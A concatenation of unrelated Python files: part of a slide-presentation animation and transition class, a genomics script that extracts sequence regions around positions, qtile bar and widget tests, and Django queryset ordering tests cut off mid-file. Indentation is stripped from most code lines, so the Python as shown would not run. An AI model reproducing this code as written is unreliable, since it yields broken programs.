obj["object"].x() - \
obj["object"].getWidth() + \
animSpeed
else:
x = obj["object"].x()
y = obj["object"].y()
x = x - animSpeed
y = y - animSpeed
if x < obj["origX"] or y < obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] and y == obj["origY"]:
return done
elif animDir == "hide":
obj["object"].show( obj["origX"], obj["origY"] )
canvas.update()
return done
else:
obj["object"].show( obj["origX"], obj["origY"] )
canvas.update()
return done
#
# If animdelay is set to pause before advancing the next
# animated object(s), sleep for the delay timeout.
#
animDelay = obj["object"].getProperty( "animationdelay" )
if animDelay > 0:
import time
time.sleep( animDelay )
return incomplete
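    # To illustrate the stepping above with made-up numbers: an object with
    # animation="left", animationspeed=8 and origX=120 starts at x=-8 and is
    # shown at x=0, 8, 16, ... on successive calls until x reaches 120, at
    # which point animateAdvance() returns done and the object is removed
    # from the animated list by animateNext().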
def objAtOrigin( self, obj ):
"""
"""
return obj["object"].x() == obj["origX"] and \
obj["object"].y() == obj["origY"]
def initAnimatedRefresh( self ):
"""
"""
self.__animatedRefresh = []
def getAnimatedRefresh( self ):
"""
"""
return self.__animatedRefresh
def hasAnimatedRefresh( self ):
"""
"""
try:
return len(self.__animatedRefresh)
except AttributeError:
return 0
def animateRefresh( self, app ):
"""
Animate into the slide the initial animated objects, to be
called when the slide has first been refreshed.
"""
#
# Quick hack to make sure the canvas is painted before
# animating the objects in.
#
import time
time.sleep(1)
objects = self.getAnimatedRefresh()
while len(objects):
for obj in objects:
if self.animateAdvance(obj, app) == done:
objects.remove( obj )
def findAnimatedRefresh( self, contents ):
"""
"""
for content in contents:
if isinstance(content, PresentationObject) and \
not isinstance(content, waitevent):
try:
if content.isAnimated() and \
content.x() >= 0 and \
content.y() >= 0:
o = { "object" : content,
"origX" : content.x(),
"origY" : content.y() }
self.getAnimatedRefresh().append(o)
except AttributeError:
pass
self.findAnimatedRefresh( content.getContents() )
def getFontHeight( self ):
"""
Get the height of the tallest font on the current text line.
"""
return self.__fontHeight
def setFontHeight( self, fontHeight ):
"""
Set the height of the tallest font on the current text line.
"""
if fontHeight > self.getRenderHeight():
self.setRenderHeight( fontHeight )
elif fontHeight == 0:
self.setRenderHeight(0)
self.__fontHeight = fontHeight
def setRenderHeight( self, renderHeight ):
"""
Set the height of the tallest object on the current line.
"""
self.__renderHeight = renderHeight
def getRenderHeight( self ):
"""
Get the height of the tallest object on the current line.
"""
return self.__renderHeight
def getProperty( self, propertyName ):
"""
        Get a property value. For the "title" property, don't search
        up the parent tree; if no title has been set for this slide,
        just return "(no title)". All other properties are resolved by
        PresentationObject.getProperty().
"""
if propertyName == "title" and \
(not self.getProperties().has_key("title") or \
len(PresentationObject.getProperty(self, "title")) == 0):
return "(no title)"
else:
return PresentationObject.getProperty( self,
propertyName )
def makeTransition( self, canvasView ):
"""
Refresh the contents of a slide with a certain transition type.
canvasView, QCanvasView object
"""
#
# number of seconds between transition animation refreshes
#
refreshTimeout = self.getProperty( "transitiondelay" )
transition = self.getProperty( "transition" )
if transition == "blindleft":
for i in range(0, canvasView.width(), 8):
canvasView.repaintContents( i, 0, 8,
canvasView.height(), false )
sleep( refreshTimeout )
elif transition == "blindright":
for i in range(canvasView.width()-8, -1, -8):
canvasView.repaintContents( i, 0, 8,
canvasView.height(), false )
sleep( refreshTimeout )
elif transition == "blindtop":
for i in range(0, canvasView.height(), 8):
canvasView.repaintContents( 0, i,
canvasView.width(), 8, false )
sleep( refreshTimeout )
elif transition == "blindbottom":
for i in range(canvasView.height()-8, -1, -8):
canvasView.repaintContents( 0, i,
canvasView.width(), 8, false )
sleep( refreshTimeout )
elif transition == "center" or transition == "centre":
x = canvasView.width() / 2 - 4
y = canvasView.height() / 2 - 4
width = 8
height = 8
while width < canvasView.width() and \
height < canvasView.height():
canvasView.repaintContents( x, y,
width,
height,
false )
x = x - 4
y = y - 4
width = width + 8
height = height + 8
if x < 0:
x = 0
if y < 0:
y = 0
sleep( refreshTimeout )
elif transition == "spiral":
INITIAL_STEP = 64
REPAINT_STEP = INITIAL_STEP / 2
x = canvasView.getApp().getWidth()/2 - REPAINT_STEP
y = canvasView.getApp().getHeight()/2 - REPAINT_STEP
oldWidth = width = INITIAL_STEP
oldHeight = height = INITIAL_STEP
canvasView.repaintContents( x, y, width, height )
while width < canvasView.width() and \
height < canvasView.height():
x = x - REPAINT_STEP
y = y - REPAINT_STEP
width = REPAINT_STEP
height = oldHeight + REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
x = x + REPAINT_STEP
width = oldWidth + REPAINT_STEP
height = REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
x = x + oldWidth
y = y + REPAINT_STEP
width = REPAINT_STEP
height = oldHeight + REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
x = x - oldWidth - REPAINT_STEP
y = y + oldHeight
width = oldWidth + REPAINT_STEP
height = REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
y = y - oldHeight - REPAINT_STEP
width = oldWidth = oldWidth + INITIAL_STEP
height = oldHeight = oldHeight + INITIAL_STEP
elif transition == "dissolve":
b = 32 # block size to display at a time
for x in range(0, canvasView.width()):
for y in range(0, canvasView.height()):
if x % b == 0 and y % b == 0 and \
x%(b*2) == 0 and y%(b*2) == 0:
canvasView.repaintContents(
x, y,
b, b,
false )
for x in range(0, canvasView.width()):
for y in range(0, canvasView.height()):
if x % b == 0 and y % b == 0 and \
x%(b*2) != 0 and y%(b*2) != 0:
canvasView.repaintContents(
x, y,
b, b,
false )
for x in range(0, canvasView.width()):
for y in range(0, canvasView.height()):
if x % b == 0 and y % b == 0 and \
((x%(b*2) == 0 and y%(b*2) != 0) or \
(x%(b*2) != 0 and y%(b*2) == 0)):
canvasView.repaintContents(
x, y,
b, b,
false )
else:
canvasView.update()
def getHtml( self ):
"""
Get the HTML associated with this object.
        Returns a list of HTML strings, with each entry being a line
        in an HTML file.
"""
background = self.getProperty( "background" )
if background == None or len(background) == 0:
background = ""
else:
background = " background=\"%s\"" % background
bgcolor = self.getProperty( "bgcolor" )
if bgcolor == None:
bgcolor = ""
else:
bgcolor = " bgcolor=\"%s\"" % bgcolor
text = self.getProperty( "color" )
if text == None:
text = ""
else:
text = " text=\"%s\"" % text
title = self.getProperty( "title" )
if title == None or len(title) == 0:
title = ""
else:
title = " title=\"%s\"" % title
htmlList = [ "<body%s%s%s%s leftmargin=\"%s\" " \
"rightmargin=\"%s\" topmargin=\"%s\" " \
"bottommargin=\"%s\">" % ( background, \
bgcolor, text, title, \
self.getProperty("marginleft"), \
self.getProperty("marginright"), \
self.getProperty("margintop"), \
self.getProperty("marginbottom") ) ]
for content in self.getContents():
if isinstance(content, PresentationObject):
htmlList = htmlList + content.getHtml()
else:
htmlList = htmlList + [ content ]
htmlList = htmlList + [ "</body>\n" ]
return htmlList
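    # As an illustration (attribute values below are hypothetical), the
    # opening tag produced above might look like:
    #   <body background="bg.png" bgcolor="#000080" text="#ffffff"
    #         title="Intro" leftmargin="10" rightmargin="10"
    #         topmargin="10" bottommargin="10">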
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Take a list of genome positions and return a 15 base region (-7 to +7)
Created: 2017-03-20 16:21
Last modified: 2017-03-20 17:44
"""
import os
import bz2
import gzip
from datetime import timedelta as _td
import fyrd
import sys
import argparse
from Bio import SeqIO as seqio
hg19 = "/godot/genomes/human/hg19"
###############################################################################
# Core Algorithm #
###############################################################################
def get_regions(positions, genome_file, base=0, count=7):
"""Return a list of regions surrounding a position.
Will loop through each chromosome and search all positions in that
chromosome in one batch. Lookup is serial per chromosome.
Args:
        positions (dict): Dictionary of {chrom->positions}
genome_file (str): Location of a genome fasta file or directory of
files. If directory, file names must be
<chrom_name>.fa[.gz]. Gzipped OK.
base (int): Either 0 or 1, base of positions in your list
count (int): Distance + and - the position to extract
Returns:
        dict: {chrom->{position->sequence}}
"""
# If genome file is a directory, use recursion! Because why not.
if os.path.isdir(genome_file):
chroms = positions.keys()
files = []
for chrom in chroms:
files.append(get_fasta_file(genome_file, chrom))
final = {}
for chrom, fl in zip(chroms, files):
final.update(
                get_regions({chrom: positions[chrom]}, fl, base, count)
)
return final
done = []
results = {}
with open_zipped(genome_file) as fasta_file:
for chrom in seqio.parse(fasta_file, 'fasta'):
if chrom.id not in positions:
continue
else:
done.append(chrom.id)
results[chrom.id] = {}
for pos in positions[chrom.id]:
ps = pos-base # Correct base-1 positions here
region = seq(chrom[ps-count:ps+count+1])
results[chrom.id][pos] = region
if len(done) != len(positions.keys()):
print('The following chromosomes were not in files: {}'
.format([i for i in positions if i not in done]))
return results
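# A minimal usage sketch (the positions below are made up; the genome path is
# the hg19 default defined above):
#
#     positions = {'chr1': [10468, 10470], 'chr2': [45122]}
#     regions = get_regions(positions, hg19, base=1)
#     # -> {'chr1': {10468: 'ACGTACGTACGTACG', ...}, 'chr2': {...}}
#
# With the default count=7, each returned sequence is 15 bases long
# (the position plus 7 bases on either side).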
###############################################################################
# Parallelization #
###############################################################################
def get_regions_parallel(positions, genome_file, base=0, count=7):
"""Return a list of regions surrounding a position.
Will loop through each chromosome and search all positions in that
chromosome in one batch. Lookup is serial per chromosome.
Args:
        positions (dict): Dictionary of {chrom->positions}
genome_file (str): Location of a genome fasta file or directory of
files. If directory, file names must be
<chrom_name>.fa[.gz]. Gzipped OK.
base (int): Either 0 or 1, base of positions in your list
count (int): Distance + and - the position to extract
Returns:
        dict: {chrom->{position->sequence}}
"""
outs = []
for chrom in positions.keys():
        if os.path.isdir(genome_file):
            fa_file = get_fasta_file(genome_file, chrom)
            if not os.path.isfile(fa_file):
                raise FileNotFoundError('{} not found.'.format(fa_file))
        else:
            fa_file = genome_file
mins = int(len(positions[chrom])/2000)+60
time = str(_td(minutes=mins))
outs.append(
fyrd.submit(
get_regions,
({chrom: positions[chrom]}, fa_file, base, count),
cores=1, mem='6GB', time=time,
)
)
final = {}
for out in outs:
final.update(out.get())
return final
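# The walltime requested above is a rough heuristic: about one minute per
# 2000 positions plus a 60-minute floor. For example, 10,000 positions on a
# single chromosome request int(10000/2000) + 60 = 65 minutes.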
###############################################################################
# Helper Functions #
###############################################################################
def seq(sequence):
"""Convert Bio.Seq object to string."""
return str(sequence.seq.upper())
def get_fasta_file(directory, name):
"""Look in directory for name.fa or name.fa.gz and return path."""
fa_file = os.path.join(directory, name + '.fa')
gz_file = fa_file + '.gz'
if os.path.isfile(fa_file):
genome_file = fa_file
elif os.path.isfile(gz_file):
        genome_file = gz_file
else:
raise FileNotFoundError(
'No {f}.fa or {f}.fa.gz file found in {d}'.format(
f=name, d=directory
)
)
return genome_file
def open_zipped(infile, mode='r'):
""" Return file handle of file regardless of zipped or not
Text mode enforced for compatibility with python2 """
mode = mode[0] + 't'
p2mode = mode
if hasattr(infile, 'write'):
return infile
if isinstance(infile, str):
if infile.endswith('.gz'):
return gzip.open(infile, mode)
if infile.endswith('.bz2'):
if hasattr(bz2, 'open'):
return bz2.open(infile, mode)
else:
return bz2.BZ2File(infile, p2mode)
return open(infile, p2mode)
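# For example (filenames are hypothetical), open_zipped('pos.tsv.gz') and
# open_zipped('pos.tsv') both return text-mode handles that can be iterated
# line by line, so callers never need to care about the compression.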
###############################################################################
# Run On Files #
###############################################################################
def parse_location_file(infile, base=None):
"""Get a compatible dictionary from an input file.
Args:
        infile (str): Path to a bed, vcf, or tsv. If tsv, it should be
                      chrom\\tpos.
Filetype detected by extension. Gzipped/B2zipped OK.
base (int): Force base of file, if not set, bed/tsv assumed base 0,
vcf assumed base-1
Returns:
dict: A dict of {chrom->pos}
"""
if not isinstance(base, int):
base = 1 if 'vcf' in infile.split('.') else 0
out = {}
for chrom, pos in tsv_bed_vcf(infile, base):
if chrom not in out:
out[chrom] = []
out[chrom].append(pos)
return out
def tsv_bed_vcf(infile, base=0):
"""Interator for generic tsv, yields column1, column2 for every line.
column1 is assumed to be string, column2 is converted to int and base is
subtracted from it.
"""
with open_zipped(infile) as fin:
for line in fin:
if line.startswith('#'):
continue
f = line.rstrip().split('\t')
yield f[0], int(f[1])-base
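# As a concrete (made-up) example, a plain tsv location file such as
#
#     chr1    12345
#     chr2    67890
#
# yields ('chr1', 12345) and ('chr2', 67890) with base=0, and
# parse_location_file() collects those into {'chr1': [12345], 'chr2': [67890]}.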
###############################################################################
# Run as a Script #
###############################################################################
DESC = """\
Get a region for every position in a given file.
Will write out one line for every line in your file, as::
chrom\\tposition\\tsequence
Parallelizes on the cluster if there is more than one chromosome.
"""
def get_parser():
"""Returns an argument parser."""
parser = argparse.ArgumentParser(
description=DESC,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Positional arguments
parser.add_argument(
'location_file',
help="File of locations, bed, vcf, or just chrom\\tposition fine."
)
# Optional flags
    parser.add_argument('-d', '--distance', type=int, default=7,
                        help="Distance up and downstream of position to get")
parser.add_argument('-g', '--genome', default=hg19,
help="Genome fasta/directory, defaults to hg19.")
parser.add_argument('-o', '--out', default=sys.stdout,
help="File to write to, default STDOUT.")
return parser
def main(argv=None):
"""Run using files, for running as a scipt."""
if not argv:
argv = sys.argv[1:]
# Get arguments
parser = get_parser()
args = parser.parse_args(argv)
locations = parse_location_file(args.location_file)
if len(locations) == 1:
results = get_regions(locations, args.genome, 0, args.distance)
else:
results = get_regions_parallel(locations, args.genome, 0,
args.distance)
s = '{}\t{}\t{}\n'
    with open_zipped(args.out, 'w') as fout:
        for chrom, positions in results.items():
for position, sequence in positions.items():
fout.write(s.format(chrom, position, sequence))
if __name__ == '__main__' and '__file__' in globals():
sys.exit(main())
|
|
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2012-2013 Craig Barnes
# Copyright (c) 2012 roger
# Copyright (c) 2012, 2014-2015 Tycho Andersen
# Copyright (c) 2014 Sean Vig
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
import six
import libqtile.layout
import libqtile.bar
import libqtile.widget
import libqtile.manager
import libqtile.config
import libqtile.confreader
class GBConfig(object):
auto_fullscreen = True
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("bb"),
libqtile.config.Group("ccc"),
libqtile.config.Group("dddd"),
libqtile.config.Group("Pppy")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.CPUGraph(
width=libqtile.bar.STRETCH,
type="linefill",
border_width=20,
margin_x=1,
margin_y=1
),
libqtile.widget.MemoryGraph(type="line"),
libqtile.widget.SwapGraph(type="box"),
libqtile.widget.TextBox(name="text",
background="333333"),
],
50,
),
bottom=libqtile.bar.Bar(
[
libqtile.widget.GroupBox(),
libqtile.widget.AGroupBox(),
libqtile.widget.Prompt(),
libqtile.widget.WindowName(),
libqtile.widget.Sep(),
libqtile.widget.Clock(),
],
50
),
# TODO: Add vertical bars and test widgets that support them
)
]
main = None
gb_config = pytest.mark.parametrize("qtile", [GBConfig], indirect=True)
def test_completion():
c = libqtile.widget.prompt.CommandCompleter(None, True)
c.reset()
c.lookup = [
("a", "x/a"),
("aa", "x/aa"),
]
assert c.complete("a") == "a"
assert c.actual() == "x/a"
assert c.complete("a") == "aa"
assert c.complete("a") == "a"
c = libqtile.widget.prompt.CommandCompleter(None)
r = c.complete("l")
assert c.actual().endswith(r)
c.reset()
assert c.complete("/bi") == "/bin/"
c.reset()
assert c.complete("/bin") != "/bin/"
c.reset()
assert c.complete("~") != "~"
c.reset()
s = "thisisatotallynonexistantpathforsure"
assert c.complete(s) == s
assert c.actual() == s
c.reset()
@gb_config
def test_draw(qtile):
qtile.testWindow("one")
b = qtile.c.bar["bottom"].info()
assert b["widgets"][0]["name"] == "groupbox"
@gb_config
def test_prompt(qtile):
assert qtile.c.widget["prompt"].info()["width"] == 0
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("a")
qtile.c.widget["prompt"].fake_keypress("Tab")
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("slash")
qtile.c.widget["prompt"].fake_keypress("Tab")
@gb_config
def test_event(qtile):
qtile.c.group["bb"].toscreen()
@gb_config
def test_textbox(qtile):
assert "text" in qtile.c.list_widgets()
s = "some text"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
s = "Aye, much longer string than the initial one"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
qtile.c.group["Pppy"].toscreen()
qtile.c.widget["text"].set_font(fontsize=12)
@gb_config
def test_textbox_errors(qtile):
qtile.c.widget["text"].update(None)
qtile.c.widget["text"].update("".join(chr(i) for i in range(255)))
qtile.c.widget["text"].update("V\xE2r\xE2na\xE7\xEE")
qtile.c.widget["text"].update(six.u("\ua000"))
@gb_config
def test_groupbox_button_press(qtile):
qtile.c.group["ccc"].toscreen()
assert qtile.c.groups()["a"]["screen"] is None
qtile.c.bar["bottom"].fake_button_press(0, "bottom", 10, 10, 1)
assert qtile.c.groups()["a"]["screen"] == 0
class GeomConf(object):
auto_fullscreen = False
main = None
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar([], 10),
bottom=libqtile.bar.Bar([], 10),
left=libqtile.bar.Bar([], 10),
right=libqtile.bar.Bar([], 10),
)
]
geom_config = pytest.mark.parametrize("qtile", [GeomConf], indirect=True)
class DBarH(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = True
class DBarV(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = False
class DWidget(object):
def __init__(self, length, length_type):
self.length, self.length_type = length, length_type
@geom_config
def test_geometry(qtile):
qtile.testXeyes()
g = qtile.c.screens()[0]["gaps"]
assert g["top"] == (0, 0, 800, 10)
assert g["bottom"] == (0, 590, 800, 10)
assert g["left"] == (0, 10, 10, 580)
assert g["right"] == (790, 10, 10, 580)
assert len(qtile.c.windows()) == 1
geom = qtile.c.windows()[0]
assert geom["x"] == 10
assert geom["y"] == 10
assert geom["width"] == 778
assert geom["height"] == 578
internal = qtile.c.internal_windows()
assert len(internal) == 4
wid = qtile.c.bar["bottom"].info()["window"]
assert qtile.c.window[wid].inspect()
@geom_config
def test_resize(qtile):
def wd(l):
return [i.length for i in l]
def offx(l):
return [i.offsetx for i in l]
def offy(l):
return [i.offsety for i in l]
for DBar, off in ((DBarH, offx), (DBarV, offy)):
b = DBar([], 100)
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 40, 40, 10]
assert off(dwidget_list) == [0, 10, 50, 90]
b._resize(101, dwidget_list)
assert wd(dwidget_list) == [10, 40, 41, 10]
assert off(dwidget_list) == [0, 10, 50, 91]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10]
assert off(dwidget_list) == [0]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 90]
assert off(dwidget_list) == [0, 10]
dwidget_list = [
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [90, 10]
assert off(dwidget_list) == [0, 90]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 80, 10]
assert off(dwidget_list) == [0, 10, 90]
class ExampleWidget(libqtile.widget.base._Widget):
orientations = libqtile.widget.base.ORIENTATION_HORIZONTAL
def __init__(self):
libqtile.widget.base._Widget.__init__(self, 10)
def draw(self):
pass
class IncompatibleWidgetConf(object):
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
left=libqtile.bar.Bar(
[
# This widget doesn't support vertical orientation
ExampleWidget(),
],
10
),
)
]
def test_incompatible_widget(qtile_nospawn):
config = IncompatibleWidgetConf
# Ensure that adding a widget that doesn't support the orientation of the
# bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
class MultiStretchConf(object):
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
),
)
]
def test_multiple_stretches(qtile_nospawn):
config = MultiStretchConf
# Ensure that adding two STRETCH widgets to the same bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
def test_basic(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
assert i["widgets"][1]["width"] == 780
assert i["widgets"][2]["offset"] == 790
libqtile.hook.clear()
def test_singlespacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][0]["width"] == 800
libqtile.hook.clear()
def test_nospacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
libqtile.hook.clear()
|
|
from __future__ import unicode_literals
from datetime import datetime
from operator import attrgetter
from django.db.models import F
from django.db.models.functions import Upper
from django.test import TestCase
from .models import Article, Author, Reference
class OrderingTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.a1 = Article.objects.create(headline="Article 1", pub_date=datetime(2005, 7, 26))
cls.a2 = Article.objects.create(headline="Article 2", pub_date=datetime(2005, 7, 27))
cls.a3 = Article.objects.create(headline="Article 3", pub_date=datetime(2005, 7, 27))
cls.a4 = Article.objects.create(headline="Article 4", pub_date=datetime(2005, 7, 28))
cls.author_1 = Author.objects.create(name="Name 1")
cls.author_2 = Author.objects.create(name="Name 2")
for i in range(2):
Author.objects.create()
def test_default_ordering(self):
"""
By default, Article.objects.all() orders by pub_date descending, then
headline ascending.
"""
self.assertQuerysetEqual(
Article.objects.all(), [
"Article 4",
"Article 2",
"Article 3",
"Article 1",
],
attrgetter("headline")
)
# Getting a single item should work too:
self.assertEqual(Article.objects.all()[0], self.a4)
def test_default_ordering_override(self):
"""
Override ordering with order_by, which is in the same format as the
ordering attribute in models.
"""
self.assertQuerysetEqual(
Article.objects.order_by("headline"), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by("pub_date", "-headline"), [
"Article 1",
"Article 3",
"Article 2",
"Article 4",
],
attrgetter("headline")
)
def test_order_by_override(self):
"""
Only the last order_by has any effect (since they each override any
previous ordering).
"""
self.assertQuerysetEqual(
Article.objects.order_by("id"), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by("id").order_by("-headline"), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_nulls_first_and_last(self):
msg = "nulls_first and nulls_last are mutually exclusive"
with self.assertRaisesMessage(ValueError, msg):
Article.objects.order_by(F("author").desc(nulls_last=True, nulls_first=True))
def test_order_by_nulls_last(self):
Article.objects.filter(headline="Article 3").update(author=self.author_1)
Article.objects.filter(headline="Article 4").update(author=self.author_2)
# asc and desc are chainable with nulls_last.
self.assertSequenceEqual(
Article.objects.order_by(F("author").desc(nulls_last=True)),
[self.a4, self.a3, self.a1, self.a2],
)
self.assertSequenceEqual(
Article.objects.order_by(F("author").asc(nulls_last=True)),
[self.a3, self.a4, self.a1, self.a2],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").desc(nulls_last=True)),
[self.a4, self.a3, self.a1, self.a2],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").asc(nulls_last=True)),
[self.a3, self.a4, self.a1, self.a2],
)
def test_order_by_nulls_first(self):
Article.objects.filter(headline="Article 3").update(author=self.author_1)
Article.objects.filter(headline="Article 4").update(author=self.author_2)
# asc and desc are chainable with nulls_first.
self.assertSequenceEqual(
Article.objects.order_by(F("author").asc(nulls_first=True)),
[self.a1, self.a2, self.a3, self.a4],
)
self.assertSequenceEqual(
Article.objects.order_by(F("author").desc(nulls_first=True)),
[self.a1, self.a2, self.a4, self.a3],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").asc(nulls_first=True)),
[self.a1, self.a2, self.a3, self.a4],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").desc(nulls_first=True)),
[self.a1, self.a2, self.a4, self.a3],
)
def test_stop_slicing(self):
"""
Use the 'stop' part of slicing notation to limit the results.
"""
self.assertQuerysetEqual(
Article.objects.order_by("headline")[:2], [
"Article 1",
"Article 2",
],
attrgetter("headline")
)
def test_stop_start_slicing(self):
"""
Use the 'stop' and 'start' parts of slicing notation to offset the
result list.
"""
self.assertQuerysetEqual(
Article.objects.order_by("headline")[1:3], [
"Article 2",
"Article 3",
],
attrgetter("headline")
)
def test_random_ordering(self):
"""
Use '?' to order randomly.
"""
self.assertEqual(
len(list(Article.objects.order_by("?"))), 4
)
def test_reversed_ordering(self):
"""
Ordering can be reversed using the reverse() method on a queryset.
This allows you to extract things like "the last two items" (reverse
and then take the first two).
"""
self.assertQuerysetEqual(
Article.objects.all().reverse()[:2], [
"Article 1",
"Article 3",
],
attrgetter("headline")
)
def test_reverse_ordering_pure(self):
qs1 = Article.objects.order_by(F('headline').asc())
qs2 = qs1.reverse()
self.assertQuerysetEqual(
qs1, [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
qs2, [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_extra_ordering(self):
"""
Ordering can be based on fields included from an 'extra' clause
"""
self.assertQuerysetEqual(
Article.objects.extra(select={"foo": "pub_date"}, order_by=["foo", "headline"]), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
def test_extra_ordering_quoting(self):
"""
If the extra clause uses an SQL keyword for a name, it will be
protected by quoting.
"""
self.assertQuerysetEqual(
Article.objects.extra(select={"order": "pub_date"}, order_by=["order", "headline"]), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
def test_extra_ordering_with_table_name(self):
self.assertQuerysetEqual(
Article.objects.extra(order_by=['ordering_article.headline']), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.extra(order_by=['-ordering_article.headline']), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_pk(self):
"""
'pk' works as an ordering option in Meta.
"""
self.assertQuerysetEqual(
Author.objects.all(),
list(reversed(range(1, Author.objects.count() + 1))),
attrgetter("pk"),
)
def test_order_by_fk_attname(self):
"""
        Ordering by a foreign key's attribute name (e.g. 'author_id')
        prevents the query from inheriting the related model's default
        ordering (#19195).
"""
for i in range(1, 5):
author = Author.objects.get(pk=i)
article = getattr(self, "a%d" % (5 - i))
article.author = author
article.save(update_fields={'author'})
self.assertQuerysetEqual(
Article.objects.order_by('author_id'), [
"Article 4",
